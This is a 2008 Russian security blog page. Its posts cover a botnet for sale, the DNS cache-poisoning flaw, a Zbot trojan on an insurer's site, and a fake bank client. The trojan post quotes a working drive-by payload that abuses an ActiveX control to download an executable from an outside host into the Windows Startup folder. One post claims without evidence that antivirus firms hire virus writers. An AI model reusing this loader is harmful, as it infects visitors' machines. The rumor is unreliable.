Опастной бот сетью может владеть каждый.

Posted in Uncategorized with tags on Декабрь 11, 2008 by isns

Пожалуй одним из самых популярных видов атак является DdOS. На сегодняшний день самое большое количество атак на «сети» совершаются именно таким образом. Сейчас в интернете предлогаются десятки бот программ которыми может управлять каждый.  Недавно получил письмо от одной хакерской команды, которая предлогает купить у них зараженную бот сеть и также самого бота на которого они дают гарантию, что он не обнаруживается антивирусными программами за 500 евро. Картинка клиента бота ниже.

797730493147a37ef02eb37dc09c26561

Таким образом это подвергает к тому, что каждый может купить подобный софт и атаковать Вас.  Из-за этого планируется резкое увеличение компьютерных атак.

Реклама

Уязвимость в DNS.

Posted in AntiHack on Декабрь 8, 2008 by isns

Краткое предисловие

DNS является одним из самых критичных компонентов сети Интернет, поэтому уязвимости в серверах имен всегда вызывали повышенный интерес у злоумышленников. 8-9 июля многие производители выпустили исправления, устраняющие фунаментальную ошибку, которая позволяет злоумышленнику произвести спуфинг атаку. Дэн Камински в своем блоге http://www.doxpara.com/?p=1165 опубликовал более подробное описание уязвимости и сделал доступным эксплоит.

В чем заключается уязвимость?

Уязвимость существует из-за того, что DNS сервер использует предсказуемый номер порта для отправки DNS запросов. Злоумышленник может угадать номер порта, который используется для отправки данных, и с помощью специально сформированного ложного DNS-ответа подменить данные в кеше DNS сервера.

Для подтверждения наличия уязвимости можно воспользоваться эксплоитами и утилитой:

BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)
BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
Утилита http://www.onzra.com/CacheAudit-Latest.tgz

Насколько опасна уязвимость?

Спуфинг атака – атака, направленная в первую очередь на клиента, а не на сервер. Уязвимость, которую мы сейчас обсуждаем, неспособна дать повышенные привилегии на уязвимой системе или выполнить произвольный код, но в сочетании с другими незначительными ошибками программного обеспечения или социальной инженерией, может стать очень опасным инструментом в руках злоумышленника.

В тестах, которые проводил Камински, ему удалось отравить кеш сервера имен приблизительно за 5-10 секунд. Эта уязвимость позволяет атакующему перезаписать данные, которые уже находятся в кеше сервера. Сервера имен, которые являются только авторитетными, не подвержены этой уязвимости. Установка высокого значения TTL для ваших хостов на авторитетном сервере не помешает злоумышленнику отравить кеш уязвимых резолверов, так как атака обходит защиту TTL.

Уязвимость затрагивает также и клиентские библиотеки (рабочие станции и сервера, которые обращаются к вышестоящим серверам имен) и может быть проведена против одиночного хоста. Также, некоторые МСЭ с функционалом трансляции адресов, рассчитанные на домашний сектор, используют предсказуемые номера для порта источника запросов, что позволяет злоумышленнику удачно произвести атаку, даже если было установлено исправление на сервер имен или клиент.

Итак, подытожим:

Отравление кеша DNS сервера можно произвести довольно быстро (5-10 секунд)
Злоумышленник может изменить данные, которые уже находятся в кеше сервера
Уязвимость может использоваться как против сервера имен, так и против рабочей станции.
Сервера и рабочие станции, которые находятся за бюджетными МСЭ с включенным NAT, подвержены уязвимости не зависимо от установленных исправлений.
Эксплоит находится в публичном доступе.
Целью атаки может стать любой промежуточный DNS сервер на пути к авторитетному серверу или DNS клиент. Это означает, что если вышестоящий DNS сервер уязвим, то не зависимо от наличия исправлений на ваших серверах, вы можете стать жертвой атаки.
Векторы атаки

Как я уже писал выше, спуфинг атака – атака, направлена на клиента, а не на сервер. Злоумышленник может:

произвести фишинг атаку и получить доступ к важным данным
произвести атаку типа «Человек посередине» и получить доступ к потенциально важным данным (паролям, номерам кредитных карт и другим данным, которые вы передаете).
используя уязвимость в ПО, получить доступ к важным данным и даже скомпрометировать целевую систему (например, из-за недостаточной проверки подлинности сервера при установке обновлений приложения, при перенаправлении пользователя на специально сформированный сайт и т.д.).
Исправления

Для устранения уязвимости необходимо установить исправления не только на хосты, которые находятся под вашим контролем, но и на все сервера имен, которые участвуют в обмене данными, иначе всегда будет существовать возможность спуфинг атаки.
Исправления доступны для Windows, Linux, UNIX и других систем. Для получения исправления обратитесь к соответствующему производителю. Список производителей доступен по адресу: http://www.kb.cert.org/vuls/id/800113

Выводы

Уязвимость достаточно опасна и может эксплуатироваться как против сервера, так и против клиента. Исправления хотя и существуют, но установлены далеко не везде. Армагеддон, конечно же не наступает, но у злоумышленников появилась дополнительное преимущество, которым они не постесняются воспользоваться в последующих атаках на ваши сети.

Рекламный эротический ролик Альфастрахования заражал пользователей трояном

Posted in Прочее with tags on Ноябрь 28, 2008 by isns

Во время кампании по увеличению трафика, главная страница сайта компании «Альфастрахование» заражала посетителей трояном через эротико-рекламный мультфильм.

Акция по привлечению посетителей на сайт «Альфастрахования» была запущена 25 ноября.  На главной странице сайта была установлена закладка — при многократном (5-8 раз) нажатии на номер телефона компании запускался swf-мультфильм эротического содержания, сопровожденный призывом воспользоваться страховыми услугами компании.

Информация об этом распространялась по Сети методом вирусного маркетинга. По данным Rambler Top100 за вчерашний день главную страницу сайта посетили 142 480 раз, что сопоставимо с недельной нормой посещаемости ресурса.

Вскоре после старта рекламной кампании обнаружилось, что в код ролика внедрена троянская программа Trojan-Spy.Win32.Zbot.gkj. По информации «Лаборатории Касперского», она была внесена в антивирусную базу 16 ноября 2008 г., и антивирусные продукты компании ее детектировали, не рекомендуя сайт к посещению. Учитывая «аккуратность» расположения трояна во flash-коде, в «Касперском» не исключают, что вредоносная программа была подсажена на сайт вручную. Вирус грузился внутри ролика следующим образом:

<pre>
HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid=«clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id=«attack»></object>
<script>
var arbitrary_file = «google-analyze.com/tracker/load.php»;
var destination = ‘c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe’;
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src=«pdf.php» type=«application/pdf» width=100 height=100></embed>
</pre>
В «Лаборатории Касперского» не располагают информацией о функциональности этого трояна, но семейству Zbot, к которому он относится, свойственно, после инсталляции себя в систему, воровать пользовательские пароли, перехватывать данные, вводимые в формы браузеров и контролировать адреса банков и платежных систем. Таким образом происходит кража аккаунтов. Трояны Zbot способны перехватывать нажатие кнопки мыши и делаеть в этот момент скриншот экрана.

Интересно, что, хотя по информации «Лаборатории Касперского», ИТ-департамент «Альфастрахования» был извещен о проблеме с главной страницей вечером 25 ноября, днем 26-го flash-ролик еще запускался, и антивирусные программы детектировали в нем троян.

Вирмейкеры работаеют на антивирусные компании

Posted in Софт with tags on Ноябрь 24, 2008 by isns

Многие антивируные комании нанимают вирмейкеров для того, чтобы те разрабатывали вирусы-черви которые бы распространялись по интернете. Для того чтобы добавлять их в свою базу. Тем заявить о себе, что мы можем выдечить Вас от этого вируса, а другие антивирусные продукты нет.

Ничего вам этого не напоминает ? =)

Официальный сайт банка Мазамбика

Posted in Прочее with tags on Ноябрь 18, 2008 by isns

Недавно проводился тест сайта банка Мозамбика. Было выявлено множество ошибок. Apache который был установлен на сервере как сервер http дает периодически ошибки и открывает не Интернет страничку, а дает возможность просмотреть каталоги файлов которые находятся на сервере.  Тем самым злоумышленник может скачивать файлы с директорий которые были закрыты для просмотра. Также на сайте есть папка “upload” в которую можно закачивать файлы на сайт.

Клиенты банка Бразилии под угрозой.

Posted in AntiHack with tags on Ноябрь 18, 2008 by isns

Наверное уже не для кого не секрет, что сейчас есть достаточное количество вариантов по взлому корпоративных сетей. Даже банковские сети оказались не настолько защищенными как могло бы показаться нам. Сегодня один мой старый знакомый на мой электронный ящик отправил программу, которая полностью копирует клиент банка Бразилии. Но в отличии от настоящего клиента, фальшивый клиент отправляет данных не в банк для входа в систему, а мошеннику на электронный адрес.  

bank_brasil

Как видно на картинке, эта программа полность эммитирует работу WEB браузера.

Начало рубрики в новом блоге.

Posted in Прочее with tags on Ноябрь 18, 2008 by isns

Приветствую Вас. Мы переехали на новый блог. Тут я буду писать всё самое важное в мире IT security.